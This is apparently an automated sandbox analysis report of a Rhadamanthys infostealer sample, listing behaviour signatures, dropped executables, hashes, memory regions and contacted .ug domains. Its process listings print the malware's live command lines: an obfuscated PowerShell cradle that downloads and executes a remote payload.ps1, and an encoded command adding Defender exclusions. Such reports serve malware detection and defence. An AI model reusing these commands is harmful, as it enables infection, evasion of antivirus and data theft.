Analysis Overview
SHA256
704c32c4d78d292ce4200b0d29df3fd748f4a28a3eb40c97b14363e22e588224
Threat Level: Known bad
The file 95c9adc065340c8b5ea552fbc19cb35e_JaffaCakes118 was found to be: Known bad.
Malicious Activity Summary
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
Blocklisted process makes network request
Downloads MZ/PE file
Command and Scripting Interpreter: PowerShell
Loads dropped DLL
Checks computer location settings
Executes dropped EXE
Drops file in System32 directory
Suspicious use of SetThreadContext
Suspicious use of NtSetInformationThreadHideFromDebugger
Command and Scripting Interpreter: PowerShell
Enumerates physical storage devices
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-04 18:06
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-04 18:06
Reported
2024-06-04 18:09
Platform
win7-20240508-en
Max time kernel
119s
Max time network
121s
Command Line
Signatures
Rhadamanthys
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 2736 created 1180 | N/A | C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe | C:\Windows\Explorer.EXE |
| PID 4076 created 1180 | N/A | C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe | C:\Windows\Explorer.EXE |
| PID 6312 created 1180 | N/A | C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe | C:\Windows\Explorer.EXE |
| PID 5168 created 1180 | N/A | C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe | C:\Windows\Explorer.EXE |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\xytp.exe | N/A |
| N/A | N/A | C:\Users\Public\xytp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Remaining\gqqtjtb\Tags.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Remaining\gqqtjtb\Tags.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\xytp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe | N/A |
| N/A | N/A | C:\Users\Public\xytp.exe | N/A |
| N/A | N/A | C:\Users\Public\xytp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe | N/A |
| N/A | N/A | C:\Users\Public\xytp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\xytp.exe | N/A |
| N/A | N/A | C:\Users\Public\xytp.exe | N/A |
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\xytp.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\xytp.exe | N/A |
| N/A | N/A | C:\Users\Public\xytp.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\95c9adc065340c8b5ea552fbc19cb35e_JaffaCakes118.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString('http://timecheck.ug/payload.ps1');s $nq
C:\Users\Public\xytp.exe
"C:\Users\Public\xytp.exe"
C:\Users\Public\xytp.exe
"C:\Users\Public\xytp.exe"
C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe
"C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe" 0
C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe
"C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"
C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe
"C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe"
C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe
"C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe"
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe
"C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe" 0
C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe
"C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe" 0
C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe
"C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe"
C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe
"C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe"
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe
"C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe" 0
C:\Windows\system32\taskeng.exe
taskeng.exe {B90D9C9A-1710-4F80-8BA9-359D7E2A6945} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:S4U:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVABhAGcAcwAuAGUAeABlADsA
C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe
"C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe"
C:\Windows\SysWOW64\dialer.exe
"C:\Windows\system32\dialer.exe"
C:\Windows\system32\taskeng.exe
taskeng.exe {90C977B0-1546-4335-A64C-057D0E45741A} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]
C:\Users\Admin\AppData\Local\Remaining\gqqtjtb\Tags.exe
C:\Users\Admin\AppData\Local\Remaining\gqqtjtb\Tags.exe
C:\Users\Admin\AppData\Local\Remaining\gqqtjtb\Tags.exe
"C:\Users\Admin\AppData\Local\Remaining\gqqtjtb\Tags.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAVABhAGcAcwAuAGUAeABlADsA
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | timecheck.ug | udp |
| RU | 91.215.85.223:80 | timecheck.ug | tcp |
| US | 8.8.8.8:53 | lastimaners.ug | udp |
| RU | 91.215.85.223:80 | lastimaners.ug | tcp |
| US | 8.8.8.8:53 | nickshort.ug | udp |
| US | 8.8.8.8:53 | kodedea.ug | udp |
| US | 8.8.8.8:53 | junks.ac.ug | udp |
| NL | 91.92.252.133:58001 | junks.ac.ug | tcp |
Files
memory/2472-38-0x000007FEF5F4E000-0x000007FEF5F4F000-memory.dmp
memory/2472-39-0x000000001B540000-0x000000001B822000-memory.dmp
memory/2472-40-0x0000000001E10000-0x0000000001E18000-memory.dmp
memory/2472-41-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp
memory/2472-42-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp
memory/2472-43-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp
memory/2472-44-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp
memory/2472-45-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp
C:\Users\Public\xytp.exe
| MD5 | 8333b78c2a3eacf8cfd843a7b62ce6ba |
| SHA1 | 81a4d7d00d04da14a6059ed068238a7e2321f721 |
| SHA256 | aaeaf69dc4dd105e8e2d637a9336af389b7c3d5175421d80fabd5c91be86b665 |
| SHA512 | c3fb49362632765d2fca9855b3ea004ba3548c8d86f92d4739b28623103b93ee532a03535b43628a1a00cd96198b91f319db9b1aa7891b17d2dedaa8ff919f27 |
memory/2588-55-0x0000000000400000-0x0000000000408000-memory.dmp
memory/2472-59-0x000007FEF5C90000-0x000007FEF662D000-memory.dmp
memory/2588-57-0x0000000000400000-0x0000000000408000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe
| MD5 | de08b70c1b36bce2c90a34b9e5e61f09 |
| SHA1 | 1628635f073c61ad744d406a16d46dfac871c9c2 |
| SHA256 | 432747c04ab478a654328867d7ca806b52fedf1572c74712fa8b7c0edb71df67 |
| SHA512 | 18a30e480ce7d122cfad5a99570042e3bef9e1f9feda1f7be32b273a7248274285c65ac997c90d3d6a950a37b4ea62e6b928bfefc924187c90e32ea571bfd1f5 |
memory/2972-72-0x0000000000DE0000-0x000000000133A000-memory.dmp
memory/2972-73-0x0000000005250000-0x0000000005700000-memory.dmp
memory/2972-74-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-79-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-83-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-81-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-77-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-75-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-85-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-87-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-123-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-89-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-133-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-91-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-93-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-95-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-97-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-99-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-101-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-103-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-105-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-131-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-129-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-127-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-125-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-121-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-119-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-4956-0x0000000000630000-0x000000000067C000-memory.dmp
memory/2972-4955-0x0000000006DB0000-0x000000000709C000-memory.dmp
memory/2972-118-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-115-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-113-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-111-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-109-0x0000000005250000-0x00000000056FB000-memory.dmp
memory/2972-107-0x0000000005250000-0x00000000056FB000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\BLHisbnd.exe
| MD5 | e13e6f7986b9d1eff55fe30133592c40 |
| SHA1 | 8299d50b76990e9dc7e0a8cc67e2f4d44cb810f5 |
| SHA256 | 407e9094206a37707a368f4cd0103269c50b8c0c03edba87b4f20664d259f207 |
| SHA512 | bb41209d410ff38c01279d119f646658e363a3055a4f152b6a2c76b9cdb1fb42441b243fa8f7fb7a353a1b0e78c619e499274185f40d8592e43551da46bd97a6 |
memory/2972-4963-0x0000000004B20000-0x0000000004B74000-memory.dmp
memory/2612-4982-0x00000000001E0000-0x0000000000540000-memory.dmp
memory/2612-4983-0x0000000004CA0000-0x0000000004F58000-memory.dmp
memory/3104-9893-0x00000000000C0000-0x000000000016C000-memory.dmp
memory/3104-9894-0x0000000004520000-0x0000000004608000-memory.dmp
memory/2612-9871-0x0000000005610000-0x0000000005704000-memory.dmp
memory/3104-17002-0x00000000008E0000-0x00000000008E8000-memory.dmp
memory/3104-17004-0x0000000005420000-0x0000000005476000-memory.dmp
memory/3224-17008-0x0000000002630000-0x0000000002684000-memory.dmp
memory/6280-17031-0x0000000000E10000-0x000000000136A000-memory.dmp
memory/2616-21966-0x0000000001040000-0x000000000159A000-memory.dmp
memory/5116-26879-0x00000000013C0000-0x00000000013C8000-memory.dmp
memory/5928-26882-0x0000000001290000-0x00000000015F0000-memory.dmp
memory/4200-31776-0x0000000000400000-0x00000000004AC000-memory.dmp
memory/7636-34003-0x0000000000400000-0x0000000000760000-memory.dmp
memory/784-38902-0x0000000000110000-0x00000000001BC000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | f23c004ee8fd3e9fba2d5bff7fc80c37 |
| SHA1 | ccbabc6c9325c36a8fb172c9ed24ef7a326e39ff |
| SHA256 | 2c726821a2d857f4cf766fe14ad03177bf7b166e9c893cf2d031fe305c9589fe |
| SHA512 | ce65f40d142b92e60b6e7bb291dd3e056641da121166002e9d5bdcadbe910727be45c48bba798fc6eb1e834a1ba0088264618d6fd1b1f09e32f5e88b8d9f7799 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PPCKUIG7KKBIGIPMTE1O.temp
| MD5 | 38cb7bef8681cbaccfbb700e36bb6da8 |
| SHA1 | ea5174b03454094d7557761d22be019d80c35497 |
| SHA256 | a8e563ca61f84175082c2a519411cba7f49d7da7d4af82d13d6354c9dbe37983 |
| SHA512 | f666bd04890413979ff80207fca78ba01913182b5ff6a24eb856b162d43b9fb44bf6e6227b7d962339d7e32abc8d60d75343fa139d453f8e16f2e28b4a17f8c5 |
memory/2240-41122-0x000000001A000000-0x000000001A2E2000-memory.dmp
memory/2240-41123-0x0000000001370000-0x0000000001378000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-06-04 18:06
Reported
2024-06-04 18:09
Platform
win10v2004-20240508-en
Max time kernel
53s
Max time network
153s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Users\Public\ikbr.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\ikbr.exe | N/A |
| N/A | N/A | C:\Users\Public\ikbr.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\ikbr.exe | N/A |
| N/A | N/A | C:\Users\Public\ikbr.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1712 set thread context of 4232 | N/A | C:\Users\Public\ikbr.exe | C:\Users\Public\ikbr.exe |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\ikbr.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Public\ikbr.exe | N/A |
| N/A | N/A | C:\Users\Public\ikbr.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\cmd.exe
cmd /c C:\Users\Admin\AppData\Local\Temp\95c9adc065340c8b5ea552fbc19cb35e_JaffaCakes118.lnk
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Windo 1 $ag=[string][char[]]@(0x69,0x65,0x58) -replace ' ','';sal s $ag;$nq=((New-Object Net.WebClient)).DownloadString('http://timecheck.ug/payload.ps1');s $nq
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=1280,i,1697479186275492802,18058102846092193784,262144 --variations-seed-version --mojo-platform-channel-handle=4572 /prefetch:8
C:\Users\Public\ikbr.exe
"C:\Users\Public\ikbr.exe"
C:\Users\Public\ikbr.exe
"C:\Users\Public\ikbr.exe"
C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe
"C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe" 0
C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe
"C:\Users\Admin\AppData\Local\Temp\dfgdvdfsds.exe" 0
C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe
"C:\Users\Admin\AppData\Local\Temp\cvbfsds.exe" 0
C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe
"C:\Users\Admin\AppData\Local\Temp\bvcfsds.exe" 0
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | timecheck.ug | udp |
| RU | 91.215.85.223:80 | timecheck.ug | tcp |
| US | 8.8.8.8:53 | 223.85.215.91.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | lastimaners.ug | udp |
| RU | 91.215.85.223:80 | lastimaners.ug | tcp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| BE | 88.221.83.234:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 234.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.150.49.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.59.114.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.83.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.117.168.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.197.17.2.in-addr.arpa | udp |
Files
memory/4112-2-0x00007FFBF8273000-0x00007FFBF8275000-memory.dmp
memory/4112-3-0x00000205FF4C0000-0x00000205FF4E2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j3fbopo1.b1q.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4112-13-0x00007FFBF8270000-0x00007FFBF8D31000-memory.dmp
memory/4112-14-0x00007FFBF8270000-0x00007FFBF8D31000-memory.dmp
C:\Users\Public\ikbr.exe
| MD5 | 8333b78c2a3eacf8cfd843a7b62ce6ba |
| SHA1 | 81a4d7d00d04da14a6059ed068238a7e2321f721 |
| SHA256 | aaeaf69dc4dd105e8e2d637a9336af389b7c3d5175421d80fabd5c91be86b665 |
| SHA512 | c3fb49362632765d2fca9855b3ea004ba3548c8d86f92d4739b28623103b93ee532a03535b43628a1a00cd96198b91f319db9b1aa7891b17d2dedaa8ff919f27 |
memory/4112-22-0x00007FFBF8270000-0x00007FFBF8D31000-memory.dmp
memory/4232-26-0x0000000000400000-0x0000000000408000-memory.dmp
memory/4232-24-0x0000000000400000-0x0000000000408000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\bvasdvdfsds.exe
| MD5 | de08b70c1b36bce2c90a34b9e5e61f09 |
| SHA1 | 1628635f073c61ad744d406a16d46dfac871c9c2 |
| SHA256 | 432747c04ab478a654328867d7ca806b52fedf1572c74712fa8b7c0edb71df67 |
| SHA512 | 18a30e480ce7d122cfad5a99570042e3bef9e1f9feda1f7be32b273a7248274285c65ac997c90d3d6a950a37b4ea62e6b928bfefc924187c90e32ea571bfd1f5 |
memory/2608-44-0x0000000000240000-0x000000000079A000-memory.dmp
memory/2608-45-0x00000000052A0000-0x0000000005750000-memory.dmp
memory/2608-46-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-47-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-69-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-79-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-73-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-71-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-67-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-65-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-63-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-61-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-59-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-55-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-53-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-51-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-50-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-57-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-81-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-77-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-76-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-85-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-91-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-97-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-101-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-99-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-95-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-93-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-90-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-83-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-87-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-103-0x00000000052A0000-0x000000000574B000-memory.dmp
memory/2608-119-0x00000000052A0000-0x000000000574B000-memory.dmp